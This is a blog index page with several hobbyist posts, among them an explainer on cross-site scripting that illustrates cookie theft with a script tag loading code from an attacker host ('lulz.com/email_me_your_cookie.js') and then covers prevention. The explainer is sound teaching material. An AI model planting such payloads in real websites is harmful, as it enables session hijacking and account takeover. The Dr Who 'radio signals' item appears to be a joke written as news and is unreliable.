The Dark Arts: Anonymity

Love him or hate him, Edward Snowden knew a thing or two about anonymity. In June of 2013, he blew the whistle on the NSA’s out-of-control programs that can target virtually anyone plugged into the digital age. The former CIA employee was working as a contractor for the NSA, where he had access to highly classified documents for many of these general populace surveillance programs. He eventually took off to Hong Kong and released the documents to a handful of reporters. One of these documents was a power point presentation of the NSA complaining about how the TAILS operating system was a major thorn in their side. Naturally, Snowden insisted that the reporters and himself only communicate via the TAILS O/S. He used PGP, which is an encryption method with the highly sophisticated title of “Pretty Good Privacy”, and asked not to be quoted at length for fear of identification via stylometry.

In this article, we’re going to go over the basics of anonymity, and introduce you to methods of staying anonymous while online.

Continue reading “The Dark Arts: Anonymity”

Printing Magnetic Fields

We told you about these “printable” magnets a while back. When you have the ability to squeeze many smaller magnets into a tiny spot and adjust their north/south orientations at will, you can not only control the strength of the overall magnetic field, you can construct new and seemingly physics-defying widgets. This article will not focus on the magnets themselves, but instead we’re going to peel away the closed source shroud that hides the inner workings of that nifty little printer of theirs. There has been a lot of talk about these printable magnets, but very little about how they’re made. This changes today. We’ll show you how this magnetic field printer works so you can get busy making your own.

History

Several years ago, a company called Correlated Magnetic Research introduced to the world the idea of a magnetic field printer with the Mini MagPrinter. It sold for a whopping $45,000, which limited it to businesses and well-funded universities. They eventually changed their company to Polymagnet and now focus on making the magnets themselves. It appears, however, that they’ve refined their printer for a higher resolution. Skip to 2:45 in this video to see the Mini MagPrinter in action. Now skip to 7.25 in this video to see their next generation printer. Now lets figure out how they work.

What We Know

magnet_06
Original Mini MagPrinter

Firstly, you can toss your Kickstarter idea in the recycle bin because they hold several patents for their printer. But that doesn’t mean you can’t make one in your garage or for your hackerspace. Their machine might have cost $45k, but we’d be willing to bet a dozen Raspberry Pi Zeros that you could make one for two orders of magnitude less. But first we need to know how it works. Let’s look at the science first.

The Curie Point

The Curie Point is a temperature where a magnet loses its magnetic field. It is theorized that magnetism arises from the spin and angular momentum of electrons. If you get them lined up correctly, you get a magnet. When you heat the metal past the Curie Point, this alignment gets all messed up and you lose the magnetic properties. And, of course, you can align the atoms back up by introducing the metal to a strong magnetic field.

Halbach Array

Halbach array is created when smaller magnets are arranged so their magnetic fields are focused in a particular direction and cancel out in another direction. The magnets made by the magnetic field printer can be considered Halbach arrays.

How It Works

Everything begins with a blank Neodymium magnet. We’re all familiar with CNC technology, so we’ll focus on the magnetic field printing head itself. Reading through the comments of the original article, many believe that it uses a combination of heating to exceed the Curie Point and a high strength electromagnet to “write” the magnetic field into the blank. However, after looking closely at this patent, it appears this is not the case. There is no heating involved. The printer head consists of “an inductor coil having multiple layers and a hole extending through the multiple layers” and works by “emitting from the inductor coil a magnetic field that magnetizes an area on a surface of the magnetizable material…”. In short, it’s just a strong, local magnetic field.

magnet_07
Left – Magnetic field print head. Right – Drawing of internal structure of the print head.

Make Your Own

Now that you have a basic idea of how to print magnetic fields, you can start working on one of your own design. You already know how to make 3d printers and laser cutters. Just take one of these designs and replace the head with your custom-built magnetic printer head, whip up some software and bring this technology into the open source community. Blank Neodymium magnets and magnetic field viewing film are fairly cheap. First one to print the skull and wrenches logo gets a free t-shirt!

The Ultraviolet Catastrophe

As the light of the 20th century was peeking over the horizon, a young physicist by the name of Max Planck was taking to heart some career advice he had received while he attended Munich University in Germany. With the recent discovery of thermodynamics, there wasn’t much left in physics to know, or so his adviser thought. Hindsight is indeed 20/20.

It turns out that Planck was an expert at thermodynamics. Having mastered the subject gave him some leverage to use against a growing group of physicists known as atomists who were using statistical models along with so called ‘atoms’ to predict experimental outcomes. Atomists believed that matter was composed of discrete units. Planck believed the world was continuous and could not be divided into any type of discrete component. And he would draw the second law of thermodynamics from his holster and put this atom idea in the clay.

Continue reading “The Ultraviolet Catastrophe”

Dr Who Returns to Earth

While searching for signs of Dalek activity in the vast depths of outer space, the Arecibo Observatory in Puerto Rico stumbled across a most interesting find. They were receiving modulated radio signals emanating from an invisible object about 25 light years away. The signals were all in the VHF band between 41 and 68 MHz. After a applying a little amplification and some wibbly wobbly timey wimey enhancements, it became clear what the signals were – 50 year old terrestrial television broadcasts. The site takes a minute or so to load due to the traffic its getting.

[Dr. Venn], the radio astronomer who discovered the signals, was able to talk NASA into pointing the Hubble Space Telescope in the direction of the now officially named “Bounce Anomaly”, but was unable to see anything. Meanwhile, a BBC team has been working with [Dr. Venn] to recover the 50 year old signals and is attempting to reconstruct entire broadcasts – some of which are the very first Dr. Who episodes.

Thanks to [PWalsh] for the tip.

The Dark Arts: Cross Site Scripting

In 2011, a group of hackers known as Lulzsec went on a two month rampage hacking into dozens of websites including those owned by FOX, PBS, the FBI, Sony and many others. The group was eventually caught and questioned in how they were able to pull off so many hacks. It would be revealed that none of the hackers actually knew each other in real life. They didn’t even know each other’s real names. They only spoke in secluded chat rooms tucked away in a dark corner of the internet and knew each other by their  aliases – [tFlow], [Sabu], [Topiary], [Kayla], to name a few. Each had their own special skill, and when combined together they were a very effective team of hackers.

It was found that they used 3 primary methods of cracking into websites – SQL injection, cross-site scripting and remote file inclusion. We gave a basic overview of how a SQL injection attack works in the previous article of this series. In this article we’re going to do the same with cross-site scripting, or XSS for short. SQL injection has been called the biggest vulnerability in the history of mankind from a potential data loss perspective. Cross-site scripting comes in as a close second. Let’s take a look at how it works.

XSS Scenario

Let us suppose that you wanted to sell an Arduino on your favorite buy-and-sell auction website. The first thing to do would be to log into the server. During this process,  a cookie from that server would be stored on your computer. Anytime you load the website in your browser, it will send that cookie along with your HTTP request to the server, letting it know that it was you and saving you from having to log in every time you visit. It is this cookie that will become the target of our attack.

You would then open up some type of window that would allow you to type in a description of your Arduino that potential buyers could read. Let’s imagine you say something like:

Arduino Uno in perfect condition. New in Box. $15 plus shipping.

You would save your description and it would be stored on a database in the server. So far, there is nothing out of the ordinary or suspicious about our scenario at all. But let’s take a look at what happens when a potential buyer logs into the server. They’re in need of an Arduino and see your ad that you just posted. What does their browser see when they load your post?

Arduino Uno in perfect condition. <b>New in Box</b>. $15 plus shipping.
xss_02
Source

Whether you realize it or not, you just ran HTML code (in the form of the bold tags) on their computer, albeit harmless code that does what both the buyer and seller want – to highlight a specific selling point of the product. But what other code can you run? Can you run code that might do something the buyer surely does not want? Code that will run on any and every computer that loads the post? Not only should you be able to see where we’re going with this, you should also be able to see the scope of the problem and just how dangerous it can be.

Now let us imagine a Lulzsec hacker is out scoping for some much needed lulz. He runs across your post and nearly instantly recognizes that you were able to run HTML code on his computer. He then makes a selling ad on the website:

Lot of 25 Raspberry Pi Zeros - New in Box - < script src="http://lulz.com/email_me_your_cookie.js" ></script> - $100, free shipping.

Now as soon as someone opens up the hacker’s ad, the script section will load up the malicious off-site code and steal the victim’s session cookie. Normally, only the website specified in a cookie has access to that cookie. Here, since the malicious code was served from the auction website’s server, the victim’s browser has no problem with sending the auction website’s cookie. Now the hacker can load the cookie into his browser to impersonate the victim, allowing the hacker access to everything his victim has access to.

Endless Opportunities

With a little imagination, you can see just how far you can reach with a cross-site scripting attack. You can envision a more targeted attack with a hacker trying to get inside a large company like Intel by exploiting a flawed competition entry process. The hacker visits the Intel Edison competition entry page and sees that he can run code in the application submission form. He knows someone on the Intel intranet will likely read his application and guesses it will be done via a browser. His XSS attack will run as soon as his entry is opened by the unsuspecting Intel employee.

This kind of attack can be run in any user input that allows containing code to be executed on another computer. Take a comment box for instance. Type in some type of < script >evil</script> into a comment box and it will load on every computer that loads that page. [Samy Kamkar] used a similar technique to pull off his famous Myspace worm as we talked about in the beginning of the previous article in this series. XSS, at one time, could even have been done with images.

Preventing XSS attacks

As with SQLi based attacks, almost all website developers in this day and age are aware of XSS and take active measures to prevent it. One prevention is validating input. Trying to run JavaScript in most applications where you should not be will not only give you an error, but will likely flag your account as being up to no good.

xss_03
Source

One thing you can do to protect yourself from such an attack is to use what is known as a sandboxed browser. This keeps code that runs in a browser in a “box” and keeps the rest of your computer safe. Most modern browsers have this technology built in. A more drastic step would be to disable JavaScript entirely from running on your computer.

There are people here that are far more knowledgeable than I on these type of hacking techniques. It was my hope to give the average hardware hacker a basic understanding of XSS and how it works. We welcome comments from those with a more advanced knowledge of cross-site scripting and other website hacking techniques that would help to deepen everyone’s understanding of these important subjects.

Source

XSS Flash animation 1

XSS Flash animation 2

Coleco Chameleon is a Kickstarter Scam

Retro gaming consoles exploded with the introduction of the Raspberry Pi and other similar single-board Linux computers. They all work the same way in that they emulate the original game console hardware with software. The game ROM is then dumped to a file and will play like the original. While this works just fine for the vast majority of us who want to get a dose of nostalgia as we chase the magic 1-up mushroom, gaming purists are not satisfied. They can tell the subtle differences between emulation and real hardware. And this is where our story begins.

Meet the Coleco Chameleon. What appears to be just another run-of-the-mill retro gaming console is not what you think. It has an FPGA core that replicates the actual hardware, to the delight of hardcore retro game scam_04enthusiasts around the world. To get it to the masses, they started an ambitious 2 million US dollar Indiegogo campaign, which has unfortunately come to a screeching halt.

Take a close look at the header image. That blue circuit board in there is nothing but an old PCI TV tuning card. To make matters worse, it also appears that their prototype system which was displayed at the Toy Fair in New York was just the guts of an SNES Jr stuffed into their shell.

This scam is clearly busted. However, the idea of reconstructing old gaming console hardware in an FPGA is a viable proposition, and there is demand for such a device from gaming enthusiasts. We can only hope that the owners of the Coleco Chameleon Kickstarter campaign meant well and slipped up trying to meet demand. If they can make a real piece of hardware, it would be welcomed.

The Dark Arts: SQL Injection and Secure Passwords

As the year of 2005 was drawing to a close, a website known as Myspace was basking in popularity. With millions of users, the site was the most popular social networking site in the world. It was unique in that it let users use HTML code to customize their Myspace page. Most of us, c’mon…admit it….had a Myspace page. The coding part was fun! But not everything was changeable with code. You could only upload up to 12 images and the Relationship Status drop-down menu only had a few options to choose from. These limitations did not sit well with [Samy Kamkar], a 19 year old hacker out of Los Angeles.

sql_03
Source

It didn’t take [Samy] long to figure out how to trick the site to let him upload more images and change his relationship status to a customized “in a hot relationship”. After hoodwinking the Myspace site with some simple hacks, he realized he could do just about anything he wanted to with it. And this is where things get interesting. It took just over a week to develop a script that would force people who visited his page to add him as a friend. But that wasn’t enough. He then programmed the script to copy itself onto the visitor’s page. [Samy] had developed a self-propagating worm.

The script went live as [Samy] went to bed. He woke up the next morning with 200 friends requests. An hour later the number had doubled. [Samy] got worried and sent an anonymous email to the webmaster warning of the worm. It was ignored. By 1:30PM that day, he had over 6,000 friends request. And like any good hacker worth his weight in floppy drives, his sense of humor had him program the script to also add his name to each visitor’s Heroes List. This angered many people, who deleted him from their page, only to get reinfected moments later when they visited another (infected) page.

[Samy’s] script was raging out of control.  As the evening closed in, his friends count had reached 919,664. It would top the 1 million mark just before Myspace took their servers offline to figure out what was going on. Two hours later, the site was back up. [Samy’s] profile page had been deleted.

[Samy] had used a technique known as cross-site scripting (XSS) to pull off his hack. We’ll touch on XSS in a later article. For now, we’re going to stick to the basics – proper passwords and SQL Injection.

Continue reading “The Dark Arts: SQL Injection and Secure Passwords”